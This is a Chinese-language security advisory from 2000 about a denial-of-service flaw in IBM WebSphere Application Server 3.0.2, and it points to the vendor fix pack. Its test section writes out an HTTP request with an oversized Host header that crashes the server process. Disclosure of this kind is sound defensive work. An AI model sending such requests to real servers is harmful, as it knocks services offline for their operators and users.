发布日期：2000-09-20
更新日期：2000-09-20

受影响系统：

IBM Websphere Application Server 3.0.2
   - Sun Solaris 8.0
   - Microsoft Windows NT 4.0
   - Linux kernel 2.3.x
   - IBM AIX 4.3

描述：

---

在Host:请求头中插入大量数据（即1092个以上的字符）可能会导致该Web服务器进程出错，
收到11号信号（SIGSEGV）或10号信号（SIGBUS）。

<* 来源： Rude Yak (rudeyak@yahoo.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下面的请求

GET /servletsnoop HTTP/1.1
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092个以上的字符)

会产生如下的IBMHTTPD日志记录项：

[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation Fault (11)




建议：

---

厂商补丁：

IBM已在WAS 3.0.2 fix pack 2中解决本漏洞的问题：

IBM Websphere Application Server 3.0.2:

http://www-4.ibm.com/software/webservers/appserv/efix.html



浏览次数：7536
严重程度：0（网友投票）